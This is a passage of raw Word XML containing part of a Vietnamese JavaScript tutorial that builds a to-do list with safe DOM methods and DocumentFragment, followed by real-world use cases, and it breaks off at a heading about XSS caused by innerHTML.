    <w:p w14:paraId="5FC58751" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E509FD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .btn-delete {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD0766" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      background: #ef4444;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1C1C0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802B998" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96C3B4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 4px 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE8ECF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-radius: 4px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42195A70" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF6037" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFC8B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60871CD0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6939DE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDDF79" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;div id="app"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D31F63" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;h2&gt;Danh Sách Công Việc&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296811AD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;div style="margin-bottom: 16px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187AE53A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;input type="text" id="task-input" placeholder="Nhập công việc mới..."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB8B192" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      &lt;button type="button" id="btn-add"&gt;Thêm mới&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180FD29" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D06E6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637EB33E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;!-- Danh sách công việc sẽ được render động vào đây --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF3DF3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;ul id="task-list" style="list-style: none; padding: 0;"&gt;&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E84062" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAD6C7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="450E6EC7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCA401" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // 1. DOM Querying chuẩn: Lấy các phần tử cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ECA0CA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const taskInput = document.querySelector('#task-input');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E14AD6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const btnAdd = document.querySelector('#btn-add');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00CB55" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const taskList = document.querySelector('#task-list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8562AF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="2B278F25" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Hàm tạo một Task Item hoàn chỉnh trong bộ nhớ trước khi gắn vào DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB416E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    function createTaskElement(taskText) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9DB45" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Khởi tạo thẻ li mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DDCC0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const li = document.createElement('li');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAA72A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      li.className = 'task-item';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BC1EF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="72EBD932" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Tạo thẻ span chứa văn bản an toàn, chống XSS bằng textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF8383E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const span = document.createElement('span');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39927DB6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      span.textContent = taskText;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED8B21" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="0AFF4CEE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Nút xóa nhiệm vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F36F510" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const btnDelete = document.createElement('button');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A646643" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      btnDelete.type = 'button';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4177D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      btnDelete.className = 'btn-delete';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6200E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      btnDelete.textContent = 'Xóa';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038867D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="638C353C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Xử lý sự kiện xóa trực tiếp trên nút</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3381C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      btnDelete.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC4091" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        // Phương thức remove() hiện đại loại bỏ trực tiếp element khỏi DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175F5EE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        li.remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568A406" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6937A0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="5187A681" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Lắp ráp các thành phần con vào thẻ li</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B713D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      li.append(span, btnDelete);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E040ADA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      return li;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2110EE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B935C17" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="3F40D232" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Bắt sự kiện thêm công việc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC9AF6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    btnAdd.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28619E32" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const text = taskInput.value.trim();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE9AF0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (!text) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198ABA90" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="7A23E3D3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const newTaskNode = createTaskElement(text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE81AB9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Gắn phần tử mới vào đầu danh sách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C561BD3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      taskList.prepend(newTaskNode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7647B7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="4AAA1E0F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Reset ô nhập liệu và trả lại tiêu điểm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FF28C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      taskInput.value = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518E18A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      taskInput.focus();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66914E90" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FC593" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="13CB7B63" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // DEMO TỐI ƯU HIỆU NĂNG: Khởi tạo hàng loạt 3 phần tử mẫu bằng DocumentFragment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049367F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const sampleTasks = ['Đọc tài liệu DOM MDN', 'Luyện tập Event Bubbling', 'Tìm hiểu Promise'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC5C17" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const fragment = document.createDocumentFragment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C258971" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="071686E8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    sampleTasks.forEach(task =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06422995" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const taskNode = createTaskElement(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341EE8E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // Gắn vào fragment ảo trong RAM, hoàn toàn không kích hoạt Reflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369849F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      fragment.appendChild(taskNode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021182BC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D117E6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="148EB5D7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Gắn toàn bộ fragment vào Live DOM -&gt; Chỉ kích hoạt DUY NHẤT 1 lần Reflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2B712" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    taskList.appendChild(fragment);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31960FB2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4F78E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9DEE6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8EF01" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Ứng dụng trong thực tế (Real-world use case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25BDDA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 1: Render Danh sách Dữ liệu Lớn từ Backend (Feed/Catalog Rendering):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1086B" w14:textId="38B2B23B" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Khi nhận mảng </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>50</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> sản phẩm từ REST API, thay vì lặp qua từng phần tử và gọi parent.innerHTML += template (hành động này vô tình xóa sạch và dựng lại toàn bộ cây DOM </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>50</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> lần, làm mất toàn bộ trạng thái input của người dùng), kỹ sư sử dụng document.createDocumentFragment() kết hợp createElement để dựng trước danh sách trong bộ nhớ, sau đó đồng loạt đưa lên màn hình trong một frame duy nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCE1DC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 2: Xây dựng Hệ thống Thông báo Động (Dynamic Toast Notifications):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD1B1D3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi người dùng lưu dữ liệu thành công, ứng dụng cần hiển thị thông báo góc màn hình và tự biến mất sau 3 giây. JavaScript sẽ tạo một phần tử &lt;div class="toast"&gt;, gắn vào container thông báo bằng prepend(), và thiết lập setTimeout(() =&gt; toast.remove(), 3000). Quá trình tạo và dọn dẹp này diễn ra hoàn toàn tự động mà không làm ảnh hưởng đến cấu trúc HTML gốc ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FE3FD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Lỗi thường gặp &amp; cách debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA2FF5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 1: Thủng lỗ hổng bảo mật XSS (Cross-Site Scripting) do lạm dụng innerHTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EBC0B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
